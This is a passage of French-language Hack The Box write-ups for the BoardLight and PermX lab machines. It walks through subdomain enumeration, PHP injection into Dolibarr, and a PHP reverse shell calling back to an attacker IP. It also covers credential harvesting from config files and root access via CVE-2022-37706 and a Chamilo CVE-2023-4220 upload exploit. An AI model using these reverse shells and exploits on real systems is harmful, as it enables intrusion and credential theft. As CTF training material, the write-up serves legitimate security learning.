style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">BoardLight</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.11</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">larissa : serverfun2<span class="nv">$2023</span>!! </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><p>Port 80 et 443 (http et https) ouverts.</p> <h2 id="foothold">Foothold </h2><h3 id="boardhtb---crmboardhtb">board.htb -&gt; crm.board.htb </h3><p>Subdomain attack :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">gobuster dns -d board.htb -t <span class="m">50</span> -w /usr/share/wordlists/dnsmap.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Domain: board.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">50</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: 1s </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /usr/share/wordlists/dnsmap.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in DNS enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Found: crm.board.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="login-page-crmboardhtb">Login page (crm.board.htb) </h3><p>On a acces a une page de login. User : admin mdp : admin</p> <h3 id="dashboard---rce">Dashboard - RCE </h3><p>Sur le dashboard <strong>Dolibarr</strong> on peut créer un site internet. On peut modifier le code html et y mettre du code php. Il faut pour cela modifier la balise car nous n&rsquo;avons pas la permission pour mettre du php:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">phP</span> <span class="k">echo</span> <span class="s2">&#34;haa&#34;</span><span class="p">;</span> <span class="cp">?&gt;</span><span class="err"> </span></span></span></code></pre></td></tr></table> </div> </div><p>Code php reverse shell.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">set_time_limit <span class="o">(</span>0<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$VERSION</span> <span class="o">=</span> <span class="s2">&#34;1.0&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$ip</span> <span class="o">=</span> <span class="s1">&#39;10.10.16.48&#39;</span><span class="p">;</span> // CHANGE THIS </span></span><span class="line"><span class="cl"><span class="nv">$port</span> <span class="o">=</span> 6789<span class="p">;</span> // CHANGE THIS </span></span><span class="line"><span class="cl"><span class="nv">$chunk_size</span> <span class="o">=</span> 1400<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$write_a</span> <span class="o">=</span> null<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$error_a</span> <span class="o">=</span> null<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$shell</span> <span class="o">=</span> <span class="s1">&#39;uname -a; w; id; /bin/sh -i&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$daemon</span> <span class="o">=</span> 0<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$debug</span> <span class="o">=</span> 0<span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Il suffit ensuite de mettre notre reverse shell php dans la page puis de l&rsquo;ouvrir. Sur notre terminal, on se met en attente avec un : <code>nc -lnvp 6789</code></p> <h3 id="user-flag">User flag </h3><p>En regardant dans les fichiers de configuration du serveur web, on trouve un mot de passe : <code>serverfun2$2023!!</code> Dans /home, on a observé l&rsquo;utilisateur <code>larissa</code> précédemment. On suppose qu&rsquo;il s&rsquo;agit de son mot de passe et ça marche !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat * <span class="p">|</span> grep pass </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="nv">$dolibarr_main_db_pass</span><span class="o">=</span><span class="s1">&#39;serverfun2$2023!!&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ su larissa </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">larissa@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ cat ~/user.txt </span></span><span class="line"><span class="cl">6e47.....36af </span></span><span class="line"><span class="cl">^C </span></span><span class="line"><span class="cl">$ ssh larissa@10.10.11.11 </span></span><span class="line"><span class="cl">Password: serverfun2<span class="nv">$2023</span>!! </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="enumeration--linpeas">Enumeration : LinPEAS </h3><p>Execution d&rsquo;un nouveau linpeas depuis le compte de larissa. On trouve des binaires qui semblent SUID vulnerable.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">══════════╣ SUID - Check easy privesc, exploits and write perms </span></span><span class="line"><span class="cl">-rwsr-xr-x <span class="m">1</span> root root 27K Jan <span class="m">29</span> <span class="m">2020</span> /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys <span class="o">(</span>Unknown SUID binary!<span class="o">)</span> </span></span><span class="line"><span class="cl">-rwsr-xr-x <span class="m">1</span> root root 15K Jan <span class="m">29</span> <span class="m">2020</span> /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd <span class="o">(</span>Unknown SUID binary!<span class="o">)</span> </span></span><span class="line"><span class="cl">-rwsr-xr-x <span class="m">1</span> root root 15K Jan <span class="m">29</span> <span class="m">2020</span> /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight <span class="o">(</span>Unknown SUID binary!<span class="o">)</span> </span></span><span class="line"><span class="cl">-rwsr-xr-x <span class="m">1</span> root root 15K Jan <span class="m">29</span> <span class="m">2020</span> /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset <span class="o">(</span>Unknown SUID binary!<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="cve-202237706--suid-binary">CVE-2022–37706 : SUID binary </h3><p>Enlightenment v0.25.3 - Privilege escalation</p> <p><a class="link" href="https://www.exploit-db.com/exploits/51180" target="_blank" rel="noopener" >https://www.exploit-db.com/exploits/51180</a></p> <p>En executant le fichier <code>exploit.sh</code> trouvé sur github, on obtient directement un accès root. Cette faille permet de trouver un binaire SUID Vulnérable sur la machine, puis de s&rsquo;en servir pour obtenir un shell en tant que root.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ./exploit.sh </span></span><span class="line"><span class="cl">CVE-2022-37706 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to find the vulnerable SUID file... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> This may take few seconds... </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Vulnerable SUID binary found! </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to pop a root shell! </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Enjoy the root shell :<span class="o">)</span> </span></span><span class="line"><span class="cl">mount: /dev/../tmp/: can<span class="err">&#39;</span>t find in /etc/fstab. </span></span><span class="line"><span class="cl"><span class="c1">## whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1">## cat /root/root.txt</span> </span></span><span class="line"><span class="cl">2de2.....893c </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/permx-htb/Sun, 04 Aug 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/permx-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="PermX cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">PermX</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.23</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><p>Port 80 http ouvert.</p> <h2 id="foothold--www-data">Foothold : www-data </h2><h3 id="permxhtb">permx.htb </h3><p>Lorsqu&rsquo;on accede au port 80 sur un navigateur, on est redirigé vers : <strong>permx.htb</strong>. Je l&rsquo;ai ajouté dans /etc/hosts et j&rsquo;ai accéder à un site internet.</p> <h3 id="subdomain--vhost-attack">subdomain / vhost attack </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Ne trouve rien...</span> </span></span><span class="line"><span class="cl">$ gobuster dns -d permx.htb -t <span class="m">50</span> -w /usr/share/wordlists/dnsmap.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Fonctionne ! (Apparement beaucoup plus fiable que gobuster dns pour trouver les sous-domaines et vhosts...)</span> </span></span><span class="line"><span class="cl">$ ffuf -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -u http://permx.htb/ -H <span class="s2">&#34;Host: FUZZ.permx.htb&#34;</span> -mc <span class="m">200</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="err">&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://permx.htb/ </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt </span></span><span class="line"><span class="cl"> :: Header : Host: FUZZ.permx.htb </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">40</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: <span class="m">200</span> </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www <span class="o">[</span>Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 544ms<span class="o">]</span> </span></span><span class="line"><span class="cl">lms <span class="o">[</span>Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 502ms<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve les sous-domaines :</p> <ul> <li><strong>www</strong></li> <li><strong>lms</strong></li> </ul> <h3 id=""><a class="link" href="https://www.permx.htb" target="_blank" rel="noopener" >www.permx.htb</a> </h3><p>Renvoie sur la meme page que <code>permx.htb</code></p> <h3 id="lmspermxhtb">lms.permx.htb </h3><p>Renvoie vers une page de login &ldquo;<strong>Chamilo</strong>&rdquo;</p> <h3 id="enumeration-des-dossiersfichiers">enumeration des dossiers/fichiers </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">gobuster dir -u lms.permx.htb -w ~/wordlists/common.txt -t <span class="nv">100</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://lms.permx.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">100</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /home/leopold/wordlists/common.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Negative Status codes: <span class="m">404</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: <span class="nv">10s</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in directory enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">/app <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 312<span class="o">]</span> <span class="o">[</span>--&gt; http://lms.permx.htb/app/<span class="o">]</span> </span></span><span class="line"><span class="cl">/bin <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 312<span class="o">]</span> <span class="o">[</span>--&gt; http://lms.permx.htb/bin/<span class="o">]</span> </span></span><span class="line"><span class="cl">/certificates <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 321<span class="o">]</span> <span class="o">[</span>--&gt; http://lms.permx.htb/certificates/<span class="o">]</span> </span></span><span class="line"><span class="cl">/.htaccess <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 278<span class="o">]</span> </span></span><span class="line"><span class="cl">/documentation <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 322<span class="o">]</span> <span class="o">[</span>--&gt; http://lms.permx.htb/documentation/<span class="o">]</span> </span></span><span class="line"><span class="cl">/.hta <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 278<span class="o">]</span> </span></span><span class="line"><span class="cl">/.htpasswd <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 278<span class="o">]</span> </span></span><span class="line"><span class="cl">/favicon.ico <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 2462<span class="o">]</span> </span></span><span class="line"><span class="cl">/index.php <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 19356<span class="o">]</span> </span></span><span class="line"><span class="cl">/LICENSE <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 35147<span class="o">]</span> </span></span><span class="line"><span class="cl">/main <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 313<span class="o">]</span> <span class="o">[</span>--&gt; http://lms.permx.htb/main/<span class="o">]</span> </span></span><span class="line"><span class="cl">/plugin <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 315<span class="o">]</span> <span class="o">[</span>--&gt; http://lms.permx.htb/plugin/<span class="o">]</span> </span></span><span class="line"><span class="cl">/robots.txt <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 748<span class="o">]</span> </span></span><span class="line"><span class="cl">/server-status <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 278<span class="o">]</span> </span></span><span class="line"><span class="cl">/src <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 312<span class="o">]</span> <span class="o">[</span>--&gt; http://lms.permx.htb/src/<span class="o">]</span> </span></span><span class="line"><span class="cl">/vendor <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 315<span class="o">]</span> <span class="o">[</span>--&gt; http://lms.permx.htb/vendor/<span class="o">]</span> </span></span><span class="line"><span class="cl">/web <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 312<span class="o">]</span> <span class="o">[</span>--&gt; http://lms.permx.htb/web/<span class="o">]</span> </span></span><span class="line"><span class="cl">/web.config <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 5780<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve notamment le fichier <code>web.config</code> qui semble intéressant. (Finalement inutile)</p> <h3 id="chamilo-lms-cve-2023-4220-exploit">Chamilo LMS CVE-2023-4220 Exploit </h3><p>En cherchant sur internet, on trouve une CVE de 2023 sur Chamilo qui permet d&rsquo;uploader puis d&rsquo;executer un fichier php sur la machine: Exploit Title : Chamilo LMS CVE-2023-4220 Exploit</p> <p>En utilisant la CVE, on upload un reverse shell php :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./CVE-2023-4220.sh -f ../php-reverse-shell.php -h http://lms.permx.htb/ -p <span class="m">6789</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-e </span></span><span class="line"><span class="cl">The file has successfully been uploaded. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-e <span class="c1"># Use This leter For Interactive TTY ;) </span> </span></span><span class="line"><span class="cl"><span class="c1">## python3 -c &#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl"><span class="c1">## export TERM=xterm</span> </span></span><span class="line"><span class="cl"><span class="c1">## CTRL + Z</span> </span></span><span class="line"><span class="cl"><span class="c1">## stty raw -echo; fg</span> </span></span><span class="line"><span class="cl">-e </span></span><span class="line"><span class="cl"><span class="c1">## Starting Reverse Shell On Port 6789 . . . . . . .</span> </span></span><span class="line"><span class="cl">-e </span></span><span class="line"><span class="cl">Listening on 0.0.0.0 <span class="m">6789</span> </span></span><span class="line"><span class="cl">&lt;!DOCTYPE HTML PUBLIC <span class="s2">&#34;-//IETF//DTD HTML 2.0//EN&#34;</span>&gt; </span></span><span class="line"><span class="cl">&lt;html&gt;&lt;head&gt; </span></span><span class="line"><span class="cl">&lt;title&gt;404 Not Found&lt;/title&gt; </span></span><span class="line"><span class="cl">&lt;/head&gt;&lt;body&gt; </span></span><span class="line"><span class="cl">&lt;h1&gt;Not Found&lt;/h1&gt; </span></span><span class="line"><span class="cl">&lt;p&gt;The requested URL was not found on this server.&lt;/p&gt; </span></span><span class="line"><span class="cl">&lt;hr&gt; </span></span><span class="line"><span class="cl">&lt;address&gt;Apache/2.4.52 <span class="o">(</span>Ubuntu<span class="o">)</span> Server at lms.permx.htb Port 80&lt;/address&gt; </span></span><span class="line"><span class="cl">&lt;/body&gt;&lt;/html&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Connection received on 10.10.11.23 <span class="m">56516</span> </span></span><span class="line"><span class="cl">Linux permx 5.15.0-113-generic <span class="c1">#123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux</span> </span></span><span class="line"><span class="cl"> 14:35:56 up 5:55, <span class="m">2</span> users, load average: 0.00, 0.14, 0.16 </span></span><span class="line"><span class="cl">USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> </span></span><span class="line"><span class="cl">/bin/sh: 0: can<span class="err">&#39;</span>t access tty<span class="p">;</span> job control turned off </span></span><span class="line"><span class="cl">$ $ $ bin </span></span><span class="line"><span class="cl">boot </span></span><span class="line"><span class="cl">dev </span></span><span class="line"><span class="cl">etc </span></span><span class="line"><span class="cl">home </span></span><span class="line"><span class="cl">lib </span></span><span class="line"><span class="cl">lib32 </span></span><span class="line"><span class="cl">lib64 </span></span><span class="line"><span class="cl">libx32 </span></span><span class="line"><span class="cl">lost+found </span></span><span class="line"><span class="cl">media </span></span><span class="line"><span class="cl">mnt </span></span><span class="line"><span class="cl">opt </span></span><span class="line"><span class="cl">proc </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">run </span></span><span class="line"><span class="cl">sbin </span></span><span class="line"><span class="cl">srv </span></span><span class="line"><span class="cl">sys </span></span><span class="line"><span class="cl">tmp </span></span><span class="line"><span class="cl">usr </span></span></code></pre></td></tr></table> </div> </div><p>Ensuite, on execute le fichier désormais présent dans le dossier et ça ouvre le reverse shell:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/reverseshell.php </span></span></code></pre></td></tr></table> </div> </div><h2 id="www-data---mtz">www-data -&gt; mtz </h2><h3 id="user-found--mtz">User Found : mtz </h3><p>On trouve le user <strong>mtz</strong> dans le <strong>/home</strong>.</p> <h3 id="configurationphp--mtz-password">configuration.php : mtz password </h3><p>Après l&rsquo;execution de <strong>linpeas.sh</strong>, on trouve un mot de passe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">╔══════════╣ Searching passwords in config PHP files </span></span><span 